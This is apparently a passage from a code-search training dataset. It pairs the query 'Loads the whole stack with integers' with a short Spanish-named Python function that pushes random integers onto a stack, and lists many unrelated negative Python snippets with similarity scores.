OrderedDict()\n keylist = ['id', 'username', 'full_name', 'biography', 'edge_follow', 'edge_followed_by', 'is_private', 'external_url', 'profile_pic_url_hd']\n\n for key in keylist:\n if key is 'edge_follow':\n userdict['following'] = dict1[key]\n elif key is 'edge_followed_by':\n userdict['followers'] = dict1[key]\n else:\n userdict[key] = dict1[key]\n\n userdict['platform'] = datadict['platform']\n\n return (json.dumps(userdict, indent=4))", "def serialize(self):\n return {\n \"first_name\" : self.first_name.capitalize(),\n \"last_name\" : self.last_name.capitalize(),\n \"name\" : self.first_name.capitalize() + ' ' + self.last_name.capitalize(),\n \"user_id\" : self.id,\n }", "def userinfo(self, access_token: str) -> dict[str, Any]:\n data: dict[str, Any] = self.client.get(\n url=f\"{self.protocol}://{self.domain}/userinfo\",\n headers={\"Authorization\": f\"Bearer {access_token}\"},\n )\n return data", "def user_dict(self):\n return {\n \"user_id\": self.user_id,\n \"firstname\": self.firstname,\n \"lastname\": self.lastname,\n \"othernames\": self.othernames,\n \"username\": self.username,\n \"email\": self.email,\n \"phonenumber\": self.phonenumber,\n \"is_admin\": self.is_admin,\n \"password\": self.password,\n \"registered_on\": self.registered_on\n }", "def user_profile(first, last, **add_info):\n profile = {}\n profile['firstname'] = first\n profile['lastname'] = last\n\n for key, value in add_info.items():\n profile[key] = value\n \n return profile", "def get_details(self):\n owner = self.fake.random_element(elements=self.owners)\n return {\n 'jurisdiction_property_id': self.fake.numerify(text='#####'),\n 
'pm_parent_property_id': self.fake.numerify(text='#####'),\n 'lot_number': self.fake.numerify(text='#####'),\n 'address_line_1': self.address_line_1(),\n 'city': 'Boring',\n 'state': 'Oregon',\n 'postal_code': \"970{}\".format(self.fake.numerify(text='##')),\n 'year_built': self.fake.random_int(min=1880, max=2015),\n 'site_eui': self.fake.random_int(min=50, max=600),\n 'owner': owner.name,\n 'owner_email': owner.email,\n 'owner_telephone': owner.telephone,\n 'owner_address': owner.address,\n 'owner_city_state': owner.city_state,\n 'owner_postal_code': owner.postal_code,\n }", "def get_patient_dict():\r\n return common.get_dict_all(get_patient_filename(), None)", "async def get_information():\n return {\n \"message\": f\"You are the Genome Researcher. \"\n f\"You are meddling with Coronavirus Sars-Cov-2 RNA... \"\n f\"Try to change the RNA at your disposal to uncover as many medical breakthroughs as possible. \"\n f\"use GET /sample to see the original RNA strand \"\n f\"use COPY /sample to create exact duplicate of original to perform experiments. \"\n f\"Try to change the RNA at your disposal to uncover as many medical breakthroughs as possible. \"\n f\"Good luck researcher. \"\n f\"Our souls fates' depend on you! \"\n }", "def person_fields(self):\r\n return persons.PersonFields(self)", "def person(languages=None, genders=None):\n languages = languages or ['en']\n genders = genders or (GENDER_FEMALE, GENDER_MALE)\n\n\n lang = random.choice(languages)\n g = random.choice(genders)\n t = title([lang], [g])\n return first_name([lang], [g]), last_name([lang]), t, g" ]
[ "0.7562372", "0.7202004", "0.68984586", "0.6763077", "0.67415196", "0.6625842", "0.6569505", "0.65048116", "0.6392704", "0.63766086", "0.6367099", "0.6340469", "0.6332369", "0.6284719", "0.626071", "0.62580657", "0.62507343", "0.6244045", "0.62412703", "0.6240264", "0.623494", "0.62251186", "0.62028", "0.61973286", "0.61804956", "0.61673146", "0.60912734", "0.60761285", "0.6073877", "0.6059034", "0.6056644", "0.6052121", "0.6049299", "0.6048786", "0.6036848", "0.60182476", "0.60044193", "0.5999764", "0.5999764", "0.59925276", "0.59887475", "0.598865", "0.59847724", "0.59814465", "0.5979082", "0.59727126", "0.5967761", "0.5959294", "0.59363925", "0.59363145", "0.5918965", "0.5918667", "0.5916391", "0.5913866", "0.5913866", "0.5910544", "0.5902117", "0.58635193", "0.5859252", "0.5856595", "0.58475083", "0.58339757", "0.58321166", "0.58194673", "0.58070034", "0.5793663", "0.57901376", "0.57738346", "0.57659984", "0.57620275", "0.57608324", "0.57560104", "0.57548815", "0.5750218", "0.5746348", "0.5746135", "0.5743273", "0.5742414", "0.5737911", "0.57363963", "0.57343346", "0.5720929", "0.5718517", "0.57174194", "0.5713608", "0.5712191", "0.5709609", "0.5707139", "0.57054925", "0.5699128", "0.5698137", "0.5697133", "0.5692204", "0.568809", "0.56867915", "0.5669925", "0.56664485", "0.5663915", "0.5659787", "0.56588507" ]
0.5966081
47
Loads the whole stack with integers
def cargaAutoInt(pila):
    while not pila_llena(pila):
        dato = random.randint(0, 10)
        apilar(pila, dato)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def comenzar_nuevo_juego():\n escena_uno.cargarEscena1(screen, display_width, display_height)#Se pone a correr la escena\n #escena_uno.cargarEscena2(screen, display_width, display_height)", "def Inicio():\n menu = \"\"\"\n Bienvenido al conversor de monedas 💰\n\n 1 - Pesos colombianos\n 2 - Pesos argentinos\n 3 - Pesos mexicanos\n\n Elige una opción: \"\"\"\n\n opcion = int(input(menu))\n \n if opcion == 1:\n moneda = 'pesos colombianos'\n elif opcion == 2:\n moneda = 'pesos argentinos'\n elif opcion == 3:\n moneda = 'pesos mexicanos'\n else:\n print(f'La opción no es valida')\n\n if opcion == 1 or opcion == 2 or opcion == 3 :\n cambio = conversor(moneda)\n print(f'La cantidad de {cambio[1]} {moneda} en dólares es de {cambio[0]} USD')", "def registro_y_login(self, cuenta, compania, dominio, usuario, password):\n self.login_page.click_desplegar_cuenta()\n self.login_page.wait_fields_load()\n self.login_page.set_cuenta(cuenta)\n self.login_page.set_jdd(compania)\n self.login_page.set_dominio(dominio)\n self.login_page.set_usuario(usuario)\n self.login_page.set_password(password)\n report.write_line(\"Llenando los datos de login\", report.Status.SUCCESS, True)\n self.login_page.click_login()", "def ejecutarOperacion(self):\n\n if self.option == 1:\n \"\"\"\n El usuario desea agregar un punto al mapa\n \"\"\"\n # Capturo los x, y\n k = self.elementoSeleccionado.split(\"-\")\n print(\"info\",k)\n x = int(k[0])\n y = int(k[1])\n # Ya capture los valores los agrego al arbol\n # Ojo: En modo creacion no entran\n self.arbol.ADD((x, y), \"X\")\n\n\n if self.option == 2:\n \"\"\"\n El usuario desea eliminar un punto del mapa\n \"\"\"\n k= self.elementoSeleccionado.split(\"-\")\n x = int(k[0])\n y = int(k[1])\n \n self.arbol.eliminarNodo((x, y))\n\n if self.option == 3:\n # Si no se ha seleccionado el punto A capturelo\n if self.PUNTOA == None and self.PUNTOB == None:\n k = self.elementoSeleccionado.split(\"-\")\n x = int(k[0])\n y = int(k[1])\n self.PUNTOA = (x, y)\n else:\n # YA se selecciono el punto A si es diferente de B se captura\n k = self.elementoSeleccionado.split(\"-\")\n x = int(k[0])\n y = int(k[1])\n # Creo el punto para poder comparar que A sea diferente de B\n temp = (x, y)\n if temp != self.PUNTOA:\n self.PUNTOB = temp\n # Lo modifico en el arbol\n self.arbol.modificarData(self.PUNTOA, self.PUNTOB)", "def mostrar_fin_juego(n_palabras):\n clear_window()\n show_title(\"FELICIDADES! GANASTE!\")\n show_msg(\"Muy bien, encontraste las %d palabras!\" % n_palabras)\n raw_input(\"Enter para menu principal \")", "def main():\n\n # on affiche la liste des cartes disponibles\n liste_des_cartes = functions.liste_cartes() + functions.liste_sauvegardes()\n functions.afficher_liste(liste_des_cartes)\n\n # selection d'une carte, un retour \"None\" indique une mauvaise saisie\n while True:\n choix = functions.choix_carte(\n input('''Indiquez le numéro de la carte choisie.\n Attention, si vous choisissez une nouvelle partie, la sauvegarde associée\n à la carte concernée sera remplacée. 
\\n'''), liste_des_cartes)\n if choix is not None:\n break\n\n # la carte est choisie, on peut générer un Labyrinthe\n laby = Labyrinthe(choix)\n # on affiche le tracé du labyrinthe\n print(laby.carte)\n\n # on lance la boucle du jeu\n while True:\n deplacements = input(\"\"\"Dans quelle direction voulez vous aller?\n \"E\" pour aller vers l'est, \"N\" pour aller vers le nord\n \"S\" pour aller vers le sud, \"O\" pour aller vers l'ouest\n Suivi d'un nombre (optionnel) pour le nombre de cases à parcourir\n \"Q\" pour sauvegarder et quitter\n \"\"\")\n # on vérifie que les données entrées par l'utilisateur sont valides\n instructions = functions.instructions_valide(deplacements)\n if instructions is not None:\n\n if instructions == \"quitter\":\n laby.sauvegarder_partie()\n break\n if instructions == \"lettre non valide\":\n print(\"La lettre entrée n'est pas valide \\n\")\n continue\n if instructions == \"non valide\":\n print(\"Les données entrées ne sont pas valides \\n\")\n continue\n else:\n # on vérifie si la partie est toujours active\n partie_en_cours = laby.effectuer_deplacements(instructions)\n if not partie_en_cours:\n # en cas de sortie trouvée, on supprime la sauvegarde\n laby.supprimer_partie()\n print(\"Partie terminée, sauvegarde supprimée\")\n break\n\n # On met en pause le système (Windows)\n os.system(\"pause\")", "def ejecutarproceso(self):\n self.generarConsultasLibres()\n self.aplicarConsultasLibres()\n self.generarCombinaciones()\n self.generarConsultasConexion()\n self.archivoSalida()", "def MenuPrincipal():\n\n print('''\n Menu Iterativo: \n 1. F. Escribir Centrado()\n 2. F.Es Multiplo\n 3. F.Temperatura Media\n 4. F.Convertir espaciado\n 5. F.Calcular Maximo y Minimo\n 6. F.Calcular area y permitro de una Circunferencia\n 7. F.Login\n 8. F.Factorial de un numero\n 9. F.Calcular MCD\n 10.F. Calculo de segundos y horas\n 11.F. Dia Juliano\n 12.F.\\Validar Fecha\n 13.F. Fracciones\n 14. 
F.SALIR\n ''')\n op = input(\"Por favor digite su opcion: \\n \")\n return op", "def juego_nuevo():\n show_title(\"Crear sopa de NxN letras\")\n nxn = pedir_entero(\"Ingrese un numero entero de la cantidad de\\nfilas y columnas que desea (Entre 10 y 20):\\n\",10,20)\n n_palabras = pedir_entero(\"Ingrese un numero entero de la cantidad de\\npalabas que deasea agregar (Entre 0 y %d):\\n\"%(nxn/2),0,(nxn/2))\n palabras = []\n palabra_min_caracteres = 3\n palabra_repetida = False\n while len(palabras)<n_palabras:\n if palabra_repetida :\n show_msg(\"Ingreso una palabra repetida\")\n palabra_repetida = False\n # Pedir una palabra que cumpla con los requisitos\n palabra = pedir_palabra(\"[%d|%d]Ingrese una palabra entre %d y %d caracteres: \"%(len(palabras)+1,n_palabras,palabra_min_caracteres,(nxn/2)),palabra_min_caracteres,(nxn/2))\n if palabra in palabras:\n palabra_repetida = True\n else :\n palabras.append(palabra)\n matrix = crear_matrix(nxn)\n matrix,posiciones,salteadas = procesar_palabras(matrix, nxn, palabras)\n matrix = completar_matrix(matrix, nxn)\n return procesar_juego(matrix,nxn,n_palabras,salteadas,posiciones)", "def entrada():\n\n #n lados\n n = int(input('Ingrese los lados del poligono: '))\n lados.append(n)\n\n for i in range(n):\n coordenada_x=int(input(f\"Ingrese el valor de la coordenada x{i+1}:\"))\n coordenada_y=int(input(f\"Ingrese el valor de la coordenada y{i+1}:\"))\n x.append(coordenada_x)\n y.append(coordenada_y)", "def cliquer(self):\n try:\n if self.input.get() != \"\":\n human = HumanPlayer(self.input.get())\n cpu = CPUPlayer(\"La Machine\", var_choix.get(), 15)\n self.input.destroy()\n self.bouton_cliquer[\"command\"] = self.jouer(human, cpu)\n except:\n input(\"Vous devez fournir un nom !\")", "def menu():\n os.system('clear')\n print(\"\\nBienvenido a el programa de Prueba de Estructura de datos\\nElija una opcion del Menu:\"+\"\\n1. Pilas\\n2. Colas\\n3. Arboles\\n4. Listas Enlazadas\\n5. Salir\")\n while True:\n try:\n value=int(input(\"\\nIntroduzca la opcion que desea utilizar: \"))\n except:\n print(\"Whoops! El valor que introdujiste no es un numero\")\n else:\n break\n return value", "def juego():\n ubicar_naves()\n global disparos_acertados, disparos_efectuados, disparos_elegidos, disparos_fallidos, disparos_repetidos\n #contadores\n disparos_efectuados = 0\n disparos_acertados = 0\n disparos_fallidos = 0\n disparos_repetidos = 0\n puntaje = 0\n for x in usuario_partida:\n usuario = x\n print(\"¿Estas listo para jugar {}? eso espero porque no hay vuelta atras\\nCargando........ 
:/\\n\".format(usuario))\n sleep(3)\n print(\"Mi flota esta compuesta por \\n- {} \\n- {} \\n- {}\\n Preparate para empezar\\n\".format(Portaviones.caracteristicas(Portaviones), Fragata.caracteristicas(Fragata), Submarinos.caracteristicas(Submarinos)))\n sleep(3)\n mostrar_tablero(tablero)\n while len(lista_ubicacion_barco) > 0:\n while True: #validacion para la fila ingresada por el usuario\n try:\n elegir_fila = int(input(\"Ingresa una fila: \"))\n if elegir_fila < 1 or (elegir_fila >10 and elegir_fila != 24):\n raise ValueError\n break\n except ValueError:\n print(\"{}No existe dicha fila{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n while True: #validacion para la columna ingresada por el usuario\n try:\n elegir_columna = int(input(\"Ingresa una columna: \"))\n if elegir_columna < 1 or (elegir_columna >10):\n raise ValueError\n break\n except ValueError:\n print(\"{}No existe dicha columna{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n tiro_elegido = (elegir_fila, elegir_columna) #cada tiro se almacena en una lista\n if tiro_elegido[0] == 24:\n print(\"Has accedido a un cheat code, los barcos estan en: \",lista_ubicacion_barco)\n elif tiro_elegido in disparos_elegidos: #si la coordenada ingresada por el usuario ya la ingreso anteriormente, quedo guardada en la lista y no le va a contar como disparo efectuadao\n print(\"Este disparo ya lo has hecho antes :|\")\n disparos_repetidos += 1 \n elif tiro_elegido in lista_ubicacion_barco:\n disparos_elegidos.append(tiro_elegido)\n print(\"Has acertado\\n\")\n tablero[elegir_fila - 1][elegir_columna - 1] = \"{}F{}\".format(Fore.RED, Fore.RESET) #se remplaza la coordenada acertada por una F roja\n lista_ubicacion_barco.remove(tiro_elegido) #se quita la posicion del barco de la lista general donde estan todas las ubicaciones\n disparos_efectuados += 1\n disparos_acertados += 1\n puntaje += 10\n #se verifica si la coordenada ingresada pertenece a alguna coordenada almacenada en las listas de cada barco y se elimina\n #cuando una lista este vacia muestra un mensaje que ha hundido a la nave especificaa\n if tiro_elegido in coordenadas_portaviones: \n coordenadas_portaviones.remove(tiro_elegido) \n if len(coordenadas_portaviones) == 0:\n print(\"Felicitaciones has hundido el portaviones, su ataque aereo quedo neutralizado\\n\")\n elif tiro_elegido in coordenadas_fragata:\n coordenadas_fragata.remove(tiro_elegido)\n if len(coordenadas_fragata) == 0:\n print(\"Felicitaciones has hundido la Fragata, su comunicacion con tierra ha sido detenida\\n\")\n elif tiro_elegido in coordenadas_submarinos:\n coordenadas_submarinos.remove(tiro_elegido)\n if len(coordenadas_submarinos) == 0:\n print(\"Felicitaciones has hundido los submarinos\\n\")\n else:\n disparos_elegidos.append(tiro_elegido)\n print(\"Has fallado\\n\")\n tablero[elegir_fila - 1][elegir_columna - 1] = \"{}X{}\".format(Fore.BLUE, Fore.RESET) #se remplaza la coordenada errada por una X azul\n disparos_efectuados += 1\n disparos_fallidos += 1\n puntaje -= 2\n mostrar_tablero(tablero)\n disparos_elegidos.clear()\n print(\"{}Ese disparo me ha dolido.{} Has logrado hundir toda mi flota :(\".format(Fore.RED, Fore.RESET))\n sleep(1)\n if disparos_efectuados == 9:\n print(\"¿Eres un robot? lo que acabas de hacer es poco probable... 
¿viste los cheat codes verdad?\")\n elif disparos_efectuados < 45:\n print(\"Excelente estrategia\")\n elif disparos_efectuados >= 45 and disparos_efectuados <= 70:\n print(\"Buena estrategia, pero hay que mejorar(o buscar los cheat codes)\")\n elif disparos_efectuados > 70:\n print(\"{}Considérese Perdedor, tiene que mejorar{}\".format(Fore.RED, Fore.RESET))\n print(\"\\nCargando tus estadisticas :| .......... pssss deberias probar el numero de kobe en fila\\n\")\n sleep(2.5)\n for x in usuario_partida: #usuario_partida almacena el usuario de cada partida, se borra la lista cuando se ingresa otro jugador\n print(\"{}{} tus estadisticas fueron las siguientes:{}\".format(Fore.YELLOW,x, Fore.RESET))\n print(\"Disparos realizados = {}\".format(disparos_efectuados))\n print(\"Puntaje total = {}\".format(puntaje))\n print(\"Disparos repetidos = {}\".format(disparos_repetidos))\n print(\"Tu tablero quedo asi:\")\n mostrar_tablero(tablero)\n #se agregaran los puntajes y disparos del usuario a la base de datos en el txt\n for x in usuario_partida:\n y = x\n with open(\"Basedatos.txt\", \"r\") as bd:\n punto = []\n datos = bd.readlines()\n nuevo_valor = \"\"\n for x in datos:\n if y in x:\n index = datos.index(x)\n puntos = x[:-1].split(\",\")\n if int(puntos[4]) < puntaje: #si el usuario ya tiene un puntaje se va a almacenar en el txt el que sea mayor (puede ser el viejo o el que acaba de obtener)\n puntos[4] = \" {}\".format(puntaje)\n if int(puntos[5]) > disparos_efectuados: #si el usuario ya ha jugado se va a almacenar en el txt la menor cantidad de disparos que haya obtenido \n puntos[5] = \" {}\".format(disparos_efectuados)\n for x in range(len(puntos)):\n if x != len(puntos) - 1:\n nuevo_valor += puntos[x] + \",\"\n else:\n nuevo_valor += puntos[x] + \"\\n\"\n datos[index] = nuevo_valor\n with open(\"Basedatos.txt\", \"w\") as bd: #se reescribira el txt con los datos del usuario que jugo la partida actualizados\n bd.writelines(datos)", "def apilar(pila, dato):\n pila.cima += 1\n pila.datos[pila.cima] = dato", "def menu():\n\tprint (\"\\n\\tSeleccionar una opcion\")\n\n\tprint (\"\\t1.- Resistencia en un Alambre \")\n\n\tprint (\"\\t2.- Voltaje\")\n\n\tprint (\"\\t3.- Corriente\")\n\n print (\"\\t4.- Resistencia\")\n\n\tprint (\"\\t5.- salir\")", "def iniciar_method(self):\r\n self.usuario = self.usuario_ingresado.text()\r\n contrasena = self.pass_in.text()\r\n self.senal.emit([self.usuario, contrasena])", "def piedra_papel_tijeras():\n print('No hay pistas')\n while True:\n aleatorio = random.randrange(0, 3) #Genera numero aleatorio entre 0 y 3\n elijePc = \"\"\n print(\"1)Piedra\")\n print(\"2)Papel\")\n print(\"3)Tijera\")\n opcion = int(input(\"Que elijes: \")) #Selecciona la opcion a utilizar \n while opcion.type() == int and opcion not in range(1,4):\n opcion = int(input('Elige uno de los valores dados:==> '))\n\n # Cambiamos nuestra seleccion para escoger que usar\n if opcion == 1:\n elijeUsuario = \"piedra\"\n elif opcion == 2:\n elijeUsuario = \"papel\"\n elif opcion == 3:\n elijeUsuario = \"tijera\"\n\n print(\"Tu elijes: \", elijeUsuario)\n\n # Todas las posibles soluciones para el juego\n if aleatorio == 0:\n elijePc = \"piedra\"\n elif aleatorio == 1:\n elijePc = \"papel\"\n elif aleatorio == 2:\n elijePc = \"tijera\"\n print(\"PC elijio: \", elijePc)\n print(\"...\")\n if elijePc == \"piedra\" and elijeUsuario == \"papel\":\n print(\"Ganaste, papel envulve piedra\")\n return True\n elif elijePc == \"papel\" and elijeUsuario == \"tijera\":\n print(\"Ganaste, Tijera corta 
papel\")\n return True\n elif elijePc == \"tijera\" and elijeUsuario == \"piedra\":\n print(\"Ganaste, Piedra pisa tijera\")\n return True\n if elijePc == \"papel\" and elijeUsuario == \"piedra\":\n print(\"perdiste, papel envulve piedra\")\n return False\n elif elijePc == \"tijera\" and elijeUsuario == \"papel\":\n print(\"perdiste, Tijera corta papel\")\n return False\n elif elijePc == \"piedra\" and elijeUsuario == \"tijera\":\n print(\"perdiste, Piedra pisa tijera\")\n return False\n elif elijePc == elijeUsuario:\n print(\"empate\")", "def cambiar_escena(self, escena):\n\t\t# Reemplazo directo\n\t\tself.escena = escena\n\t\t# Reiniciar la ventana con el tamaño de la nueva escena\n\t\tprint(\"Iniciando nuevo contexto OpenGL...\")\n\t\tv_ancho, v_alto = escena.tam\n\t\topciones = OPENGL | DOUBLEBUF\n\t\tif escena.pant_compl:\n\t\t\topciones |= FULLSCREEN\n\t\tpygame.display.set_mode((v_ancho, v_alto), opciones)\n\t\t# Título por defecto de la ventana\n\t\tpygame.display.set_caption(escena.nombre)\n\t\t# Reiniciar OpenGL\n\t\tself.gl_ini(v_ancho, v_alto)\n\t\t# Darle los datos del núcleo a la ventana\n\t\tself.escena.nucleo = self\n\t\tself.escena.eventos = self.mapa_eve\n\t\tglClearColor(*escena.color)\n\t\t# Ejecutar la lógica inicial de la escena\n\t\tprint(\"Iniciando escena...\")\n\t\tself.escena.logica_ini()", "def aplicar_operacion_avanzadas(self,operacion,complejo1,exponente):\n exponente_int = int(exponente)\n nuevo_complejo = self.controlador.ejecutar_operacion_avanzada(operacion,complejo1,exponente_int)\n raices = 0\n print('\\nResultados\\n')\n if operacion == '1':# si es potencia\n nuevo_complejo.formaBinomica()\n nuevo_complejo.formaPolar()\n print('\\n')\n elif operacion == '2': # si es Raiz\n for complejo in nuevo_complejo:\n print('Raiz:',raices) \n complejo.formaBinomica()\n complejo.formaPolar()\n print('\\n')\n raices = raices + 1\n elif operacion == '3':# si es raices primitivas\n for complejo in nuevo_complejo:\n print('Raiz:',raices)\n complejo.formaBinomica()\n complejo.formaPolar()\n print('\\n')\n raices = raices + 1\n print('\\n')", "def jeu():\n\n #le pc choisit un nombre\n pc_choice = random.randint(1,3)\n\n #on change l'image en fonction de ce que montre le pc\n if pc_choice == 1:\n whatPcDoes_Button.config(image = image_boutonPierre)\n elif pc_choice == 2:\n whatPcDoes_Button.config(image = image_boutonFeuille)\n else:\n whatPcDoes_Button.config(image = image_boutonCiseaux)\n\n #on change l'image en fonction de ce que montre le joueur\n if usr_choice == 1:\n whatPlayerDoes_Button.config(image = image_boutonPierre)\n elif usr_choice == 2:\n whatPlayerDoes_Button.config(image = image_boutonFeuille)\n else:\n whatPlayerDoes_Button.config(image = image_boutonCiseaux)\n\n #actions sur la console\n print(\"le joueur choisit : \", usr_choice)\n print(\"le pc choisit : \", pc_choice)\n #application des règles du jeu\n fonctions_pfc.regles_jeu(usr_choice,pc_choice)\n #on réactive les boutons pierre feuille et ciseaux\n enable()\n\n #on affiche si le joueur perd ou gagne\n LabelResultats.config(text=fonctions_pfc.result)\n\n #on affiche le score du pc\n LabelScorePc.config(text=fonctions_pfc.pc_score,font=(\"Berlin Sans FB Demi\",15))\n LabelScoreJoueur.config(text=fonctions_pfc.usr_score,font=(\"Berlin Sans FB Demi\",15))\n\n #FIXER LA LIMITE DU SCORE POUR GAGNER -->le premier arrivé à 10 à gagner\n if fonctions_pfc.y == 5:\n print(\"le pc a gagné la partie ! 
\")\n undisplay_pack_component()\n boutonEnd.pack(expand='YES')\n elif fonctions_pfc.x == 5:\n print(\"le joueur a gagné la partie ! \")\n undisplay_pack_component()\n boutonEnd.pack(expand='YES')", "def regLA(): # Esta sección fue hecha por Ángel\n print(\"A continuación se muestra la lista de productos en el inventario: \")\n creaLprod(creaLI(\"Inventario\"))\n resp = 1\n while resp == 1:\n fecha = input(\"Fecha de llegada del articulo(dd/mm/aa): \")\n producto = int(input(\"Introduce el número del producto reabastecido: \"))\n cantiProd = int(input(\"Ingresa la cantidad que fue reabastecida: \")) \n geneRegLleg(fecha, producto, cantiProd)\n listaaIM = crearLBI()\n geneALlegA(crearLIA(actualizarLInv(producto, listaaIM, cantiProd)))\n resp = int(input(\"Llegaron más artículos 1. Sí 2. No: \"))\n if resp == \"2\":\n menu(listaUCE)", "def elegir_operacion_avanzada(self):\n \n while True:\n input_operacion_avanzada = input('Elegir operacion\\n1. Potencia\\n2. Radicacion\\n3. Raices primitivas\\n')\n if input_operacion_avanzada == '1':\n break\n elif input_operacion_avanzada == '2':\n break\n elif input_operacion_avanzada == '3':\n break\n else: \n print('Elegir la correcta operacion avanzada') \n \n self.entrada_operacion_avanzada(input_operacion_avanzada)", "def pedir_opcion(cantidad = SALIR):\n return verif_ingreso(input(\"Su elección: \"), cantidad, \"Ingrese un número de opción: \")", "def iniciarEntradas(self):\n tituloEntry = self.crearEntrada(self.master, self.tituloString, 30, 1, 1)\n descripcionEntry = self.crearEntrada(self.master, self.descripcionString, 30, 2, 1)", "def on_btnAltacli_clicked(self, widget):\n try:\n dni = variables.filacli[0].get_text()\n apel = variables.filacli[1].get_text()\n nome = variables.filacli[2].get_text()\n data = variables.filacli[3].get_text()\n registro = (dni, apel, nome, data)\n if funcionescli.validoDNI(dni):\n funcionescli.insertarcli(registro)\n funcionescli.listadocli(variables.listclientes)\n funcionescli.limpiarentry(variables.filacli)\n else:\n variables.menslabel[0].set_text('ERROR DNI')\n except:\n print(\"Error alta cliente\")", "def input_usuario(self):\n print(\"Elegir Nivel de operacion\\n\")\n while True:\n input_complejo = self.elegir_nivel_operacion()\n \n if input_complejo == '1':\n self.elegir_operacion_basica()\n elif input_complejo == '2':\n self.elegir_operacion_avanzada()\n elif input_complejo == '3':\n self.entrada_operacion_fasores()\n elif input_complejo == 'x' or input_complejo == 'X':\n print('Programa finalizado')\n sys.exit()\n else:\n print('Elegir el Nivel de operacion correcta\\n')", "def run():\n \n contrasena = generar_contrasena()\n print('Tu nueva contraseña es: ' + contrasena)", "def get_user_input():\n st.sidebar.header('Parámetros de entrada') \n acti2 = st.sidebar.selectbox('Código de Actividad Económica', ['ACABADO DE PRODUCTOS TEXTILES',\n 'ACTIVIDADES COMBINADAS DE SERVICIOS ADMINISTRATIVOS DE OFICINA', \n 'ACTIVIDADES CREATIVAS, ARTÍSTICAS Y DE ENTRETENIMIENTO', \n 'ACTIVIDADES DE AGENCIAS DE COBRO Y AGENCIAS DE CALIFICACIÓN CREDITICIA', \n 'ACTIVIDADES DE AGENCIAS DE EMPLEO', \n 'ACTIVIDADES DE AGENCIAS DE VIAJES', \n 'ACTIVIDADES DE AGENTES Y CORREDORES DE SEGUROS', \n 'ACTIVIDADES DE ALOJAMIENTO PARA ESTANCIAS CORTAS', \n 'ACTIVIDADES DE APOYO A LA ENSEÑANZA', \n 'ACTIVIDADES DE APOYO PARA LA EXTRACCIÓN DE PETRÓLEO Y GAS NATURAL', \n 'ACTIVIDADES DE APOYO PARA OTRAS ACTIVIDADES DE EXPLOTACIÓN DE MINAS Y CANTERAS', \n 'ACTIVIDADES DE ARQUITECTURA E INGENIERÍA Y ACTIVIDADES CONEXAS DE CONSULTORÍA 
TÉCNICA', \n 'ACTIVIDADES DE ASOCIACIONES EMPRESARIALES Y DE EMPLEADORES', \n 'ACTIVIDADES DE ASOCIACIONES PROFESIONALES', \n 'ACTIVIDADES DE ATENCIÓN DE ENFERMERÍA EN INSTITUCIONES', \n 'ACTIVIDADES DE BIBLIOTECAS Y ARCHIVOS', \n 'ACTIVIDADES DE CENTROS DE LLAMADAS', \n 'ACTIVIDADES DE CLUBES DEPORTIVOS', \n 'ACTIVIDADES DE CONSULTORÍA DE GESTIÓN', \n 'ACTIVIDADES DE CONTABILIDAD, TENEDURÍA DE LIBROS Y AUDITORÍA; CONSULTORÍA FISCAL', \n 'ACTIVIDADES DE DESCONTAMINACIÓN Y OTROS SERVICIOS DE GESTIÓN DE DESECHOS', \n 'ACTIVIDADES DE DISTRIBUCIÓN DE PELÍCULAS CINEMATOGRÁFICAS, VÍDEOS Y PROGRAMAS DE TELEVISIÓN', \n 'ACTIVIDADES DE ENVASADO Y EMPAQUETADO', \n 'ACTIVIDADES DE EXHIBICIÓN DE PELÍCULAS CINEMATOGRÁFICAS Y CINTAS DE VÍDEO', \n 'ACTIVIDADES DE FOTOGRAFÍA', \n 'ACTIVIDADES DE GESTIÓN DE FONDOS', \n 'ACTIVIDADES DE HOSPITALES', \n 'ACTIVIDADES DE INVESTIGACIÓN', \n 'ACTIVIDADES DE JARDINES BOTÁNICOS Y ZOOLÓGICOS Y RESERVAS NATURALES', \n 'ACTIVIDADES DE JUEGOS DE AZAR Y APUESTAS', \n 'ACTIVIDADES DE MENSAJERÍA', \n 'ACTIVIDADES DE MUSEOS Y GESTIÓN DE LUGARES Y EDIFICIOS HISTÓRICOS', \n 'ACTIVIDADES DE MÉDICOS Y ODONTÓLOGOS', \n 'ACTIVIDADES DE OFICINAS CENTRALES', \n 'ACTIVIDADES DE OPERADORES TURÍSTICOS', \n 'ACTIVIDADES DE ORGANIZACIONES RELIGIOSAS', \n 'ACTIVIDADES DE OTRAS ASOCIACIONES N.C.P.', \n 'ACTIVIDADES DE PARQUES DE ATRACCIONES Y PARQUES TEMÁTICOS', \n 'ACTIVIDADES DE PRODUCCIÓN DE PELÍCULAS CINEMATOGRÁFICAS, VÍDEOS Y PROGRAMAS DE TELEVISIÓN', \n 'ACTIVIDADES DE RESTAURANTES Y DE SERVICIO MÓVIL DE COMIDAS', \n 'ACTIVIDADES DE SEGURIDAD PRIVADA', \n 'ACTIVIDADES DE SERVICIO DE BEBIDAS', \n 'ACTIVIDADES DE SERVICIO DE SISTEMAS DE SEGURIDAD', \n 'ACTIVIDADES DE SERVICIOS RELACIONADAS CON LA IMPRESIÓN', \n 'ACTIVIDADES DE SERVICIOS VINCULADAS AL TRANSPORTE ACUÁTICO', \n 'ACTIVIDADES DE SERVICIOS VINCULADAS AL TRANSPORTE AÉREO', \n 'ACTIVIDADES DE SERVICIOS VINCULADAS AL TRANSPORTE TERRESTRE', \n 'ACTIVIDADES DE TELECOMUNICACIONES ALÁMBRICAS', \n 'ACTIVIDADES DE TELECOMUNICACIONES INALÁMBRICAS', \n 'ACTIVIDADES DE TELECOMUNICACIONES POR SATÉLITE.', \n 'ACTIVIDADES ESPECIALIZADAS DE DISEÑO', \n 'ACTIVIDADES INMOBILIARIAS REALIZADAS A CAMBIO DE UNA RETRIBUCIÓN O POR CONTRATA', \n 'ACTIVIDADES INMOBILIARIAS REALIZADAS CON BIENES PROPIOS O ARRENDADOS', \n 'ACTIVIDADES JURÍDICAS', \n 'ACTIVIDADES POSTALES', \n 'ACTIVIDADES VETERINARIAS', \n 'ACUICULTURA DE AGUA DULCE', \n 'ACUICULTURA MARÍTIMA', \n 'ADMINISTRACIÓN DE MERCADOS FINANCIEROS', \n 'ALMACENAMIENTO Y DEPÓSITO', \n 'ALQUILER Y ARRENDAMIENTO DE OTROS EFECTOS PERSONALES Y ENSERES DOMÉSTICOS', \n 'ALQUILER Y ARRENDAMIENTO DE OTROS TIPOS DE MAQUINARIA, EQUIPO Y BIENES TANGIBLES', \n 'ALQUILER Y 